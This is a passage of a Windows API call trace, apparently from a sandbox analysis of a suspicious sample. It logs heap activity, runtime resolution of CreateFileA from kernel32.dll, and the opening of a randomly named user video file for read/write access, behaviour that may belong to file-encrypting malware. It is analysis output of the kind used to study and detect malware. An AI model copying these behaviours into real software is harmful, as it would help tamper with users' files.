HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db138 | out: hHeap=0x8a0000) returned 1 [0198.759] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba180 [0198.759] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1af0 [0198.759] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0198.759] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1af0 [0198.759] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd510 [0198.759] CharLowerBuffW (in: lpsz="hwnd", cchLength=0x4 | out: lpsz="hwnd") returned 0x4 [0198.759] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd468 [0198.759] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19f0 [0198.759] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b70 [0198.759] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9e38 [0198.759] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd468 | out: hHeap=0x8a0000) returned 1 [0198.759] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0198.759] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9e38 | out: hHeap=0x8a0000) returned 1 [0198.759] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0198.760] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de218 [0198.760] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b70 [0198.760] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9e38 [0198.760] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19f0 [0198.760] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1d30 [0198.760] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd468 [0198.760] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9e38 | out: hHeap=0x8a0000) returned 1 [0198.760] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0198.760] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd468 | out: hHeap=0x8a0000) returned 1 [0198.760] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0198.760] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1d30 [0198.760] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd468 [0198.760] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19f0 [0198.760] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1960 [0198.760] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9e38 [0198.760] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd468 | out: hHeap=0x8a0000) returned 1 [0198.760] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0198.760] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9e38 | out: hHeap=0x8a0000) returned 1 [0198.760] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0198.760] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1960 [0198.760] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9e38 [0198.760] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19f0 [0198.760] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b00 [0198.760] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd468 [0198.760] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9e38 | out: hHeap=0x8a0000) returned 1 [0198.760] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0198.760] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd468 | out: hHeap=0x8a0000) returned 1 [0198.760] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0198.760] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b00 [0198.761] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd468 [0198.761] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19f0 [0198.761] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a00 [0198.761] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9e38 [0198.761] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd468 | out: hHeap=0x8a0000) returned 1 [0198.761] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0198.761] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9e38 | out: hHeap=0x8a0000) returned 1 [0198.761] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0198.761] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a00 [0198.761] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9e38 [0198.761] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19f0 [0198.761] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1980 [0198.761] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd468 [0198.761] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9e38 | out: hHeap=0x8a0000) returned 1 [0198.761] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0198.761] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd468 | out: hHeap=0x8a0000) returned 1 [0198.761] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0198.761] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1980 [0198.761] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd468 [0198.761] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19f0 [0198.761] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1900 [0198.761] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9e38 [0198.761] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd468 | out: hHeap=0x8a0000) returned 1 [0198.761] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0198.761] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9e38 | out: hHeap=0x8a0000) returned 1 [0198.761] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0198.761] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1900 [0198.762] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9e38 [0198.762] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19f0 [0198.762] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ac0 [0198.762] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd468 [0198.762] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9e38 | out: hHeap=0x8a0000) returned 1 [0198.762] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0198.762] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd468 | out: hHeap=0x8a0000) returned 1 [0198.762] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0198.762] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0198.762] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd468 [0198.762] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ac0 [0198.762] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0198.762] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xb) returned 0x9b9e38 [0198.762] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x9b9e38, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFile", lpUsedDefaultChar=0x0) returned 11 [0198.762] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9e38 | out: hHeap=0x8a0000) returned 1 [0198.762] GetProcAddress (hModule=0x75990000, lpProcName="CreateFile") returned 0x0 [0198.762] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd468 | out: hHeap=0x8a0000) returned 1 [0198.762] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0198.762] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ac0 [0198.762] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de9e8 [0198.762] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd468 [0198.763] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19f0 [0198.763] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileA", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0198.763] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9b9e38 [0198.763] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileA", cchWideChar=12, lpMultiByteStr=0x9b9e38, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFileA", lpUsedDefaultChar=0x0) returned 12 [0198.763] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9e38 | out: hHeap=0x8a0000) returned 1 [0198.763] GetProcAddress (hModule=0x75990000, lpProcName="CreateFileA") returned 0x759a53c6 [0198.763] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd468 | out: hHeap=0x8a0000) returned 1 [0198.763] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0198.763] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de9e8 | out: hHeap=0x8a0000) returned 1 [0198.763] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0198.763] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de9e8 [0198.763] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ac0 [0198.763] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19f0 [0198.763] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1890 [0198.763] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1aa0 [0198.763] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a20 [0198.763] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1990 [0198.763] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18b0 [0198.763] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10001) returned 0xbca008 [0198.763] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\z58zBpaZzgTTH\\448L4fbhgcrO5YwRMWv_.avi", cchWideChar=76, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 76 [0198.763] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4c) returned 0x9238c0 [0198.763] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\z58zBpaZzgTTH\\448L4fbhgcrO5YwRMWv_.avi", cchWideChar=76, lpMultiByteStr=0x9238c0, cbMultiByte=76, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\z58zBpaZzgTTH\\448L4fbhgcrO5YwRMWv_.avi", lpUsedDefaultChar=0x0) returned 76 [0198.763] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9238c0 | out: hHeap=0x8a0000) returned 1 [0198.763] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0198.764] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0198.764] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0198.764] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1aa0 | out: hHeap=0x8a0000) returned 1 [0198.764] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0198.764] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1990 | out: hHeap=0x8a0000) returned 1 [0198.764] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0198.764] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de9e8 | out: hHeap=0x8a0000) returned 1 [0198.764] CreateFileA (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\z58zBpaZzgTTH\\448L4fbhgcrO5YwRMWv_.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\z58zbpazzgtth\\448l4fbhgcro5ywrmwv_.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0198.766] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18b0 [0198.766] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e8808 [0198.766] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de9e8 [0198.766] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd468 [0198.766] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9e38 [0198.766] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba498 [0198.767] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1990 [0198.767] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba498 | out: hHeap=0x8a0000) returned 1 [0198.767] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1990 | out: hHeap=0x8a0000) returned 1 [0198.767] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9e38 | out: hHeap=0x8a0000) returned 1 [0198.767] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9e38 [0198.767] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba498 [0198.767] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba390 [0198.767] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1990 [0198.767] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0xbca008, cbMultiByte=76, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 76 [0198.767] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x98) returned 0x907778 [0198.767] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0xbca008, cbMultiByte=76, lpWideCharStr=0x907778, cchWideChar=76 | out: lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\z58zBpaZzgTTH\\448L4fbhgcrO5YwRMWv_.avi") returned 76 [0198.767] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba390 | out: hHeap=0x8a0000) returned 1 [0198.767] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xa0) returned 0x8f9100 [0198.767] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x907778 | out: hHeap=0x8a0000) returned 1 [0198.767] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xbca008 | out: hHeap=0x8a0000) returned 1 [0198.767] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba390 [0198.767] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f58 [0198.767] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9f0 [0198.767] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a20 [0198.767] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9f0 | out: hHeap=0x8a0000) returned 1 [0198.767] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0198.767] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f58 | out: hHeap=0x8a0000) returned 1 [0198.767] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f58 [0198.767] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9f0 [0198.767] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda20 [0198.767] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a20 [0198.767] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda20 | out: hHeap=0x8a0000) returned 1 [0198.767] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0198.767] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9f0 | out: hHeap=0x8a0000) returned 1 [0198.767] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9f0 [0198.768] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda20 [0198.768] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd390 [0198.768] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a20 [0198.768] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd390 | out: hHeap=0x8a0000) returned 1 [0198.768] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0198.768] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda20 | out: hHeap=0x8a0000) returned 1 [0198.768] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda20 [0198.768] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd390 [0198.768] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd738 [0198.768] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a20 [0198.768] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd738 | out: hHeap=0x8a0000) returned 1 [0198.768] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0198.768] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd390 | out: hHeap=0x8a0000) returned 1 [0198.768] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd390 [0198.768] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd738 [0198.768] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8a0 [0198.768] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a20 [0198.768] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8a0 | out: hHeap=0x8a0000) returned 1 [0198.768] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0198.768] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd738 | out: hHeap=0x8a0000) returned 1 [0198.768] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd738 [0198.768] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8a0 [0198.769] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba120 [0198.769] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a20 [0198.769] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba120 | out: hHeap=0x8a0000) returned 1 [0198.769] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0198.769] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8a0 | out: hHeap=0x8a0000) returned 1 [0198.769] FreeLibrary (hLibModule=0x75990000) returned 1 [0198.769] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0198.769] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0198.769] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0198.769] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0198.769] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0198.769] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0198.769] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0198.769] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de218 | out: hHeap=0x8a0000) returned 1 [0198.769] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd510 | out: hHeap=0x8a0000) returned 1 [0198.769] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0198.769] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd960 | out: hHeap=0x8a0000) returned 1 [0198.769] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba408 | out: hHeap=0x8a0000) returned 1 [0198.769] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba138 | out: hHeap=0x8a0000) returned 1 [0198.769] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9c70 | out: hHeap=0x8a0000) returned 1 [0198.769] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd888 | out: hHeap=0x8a0000) returned 1 [0198.769] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd978 | out: hHeap=0x8a0000) returned 1 [0198.769] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a90 | out: hHeap=0x8a0000) returned 1 [0198.769] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba420 | out: hHeap=0x8a0000) returned 1 [0198.769] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3f0 | out: hHeap=0x8a0000) returned 1 [0198.769] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7b0 | out: hHeap=0x8a0000) returned 1 [0198.769] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fe8 | out: hHeap=0x8a0000) returned 1 [0198.769] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4f8 | out: hHeap=0x8a0000) returned 1 [0198.769] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd420 | out: hHeap=0x8a0000) returned 1 [0198.769] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7c8 | out: hHeap=0x8a0000) returned 1 [0198.769] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4c8 | out: hHeap=0x8a0000) returned 1 [0198.770] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd948 | out: hHeap=0x8a0000) returned 1 [0198.770] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4b0 | out: hHeap=0x8a0000) returned 1 [0198.770] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b50 | out: hHeap=0x8a0000) returned 1 [0198.770] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1c8 | out: hHeap=0x8a0000) returned 1 [0198.770] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd858 | out: hHeap=0x8a0000) returned 1 [0198.770] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda50 | out: hHeap=0x8a0000) returned 1 [0198.770] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3f0 | out: hHeap=0x8a0000) returned 1 [0198.770] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7f8 | out: hHeap=0x8a0000) returned 1 [0198.770] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba270 | out: hHeap=0x8a0000) returned 1 [0198.770] HeapFree (in: hHeap=0x8a0000, 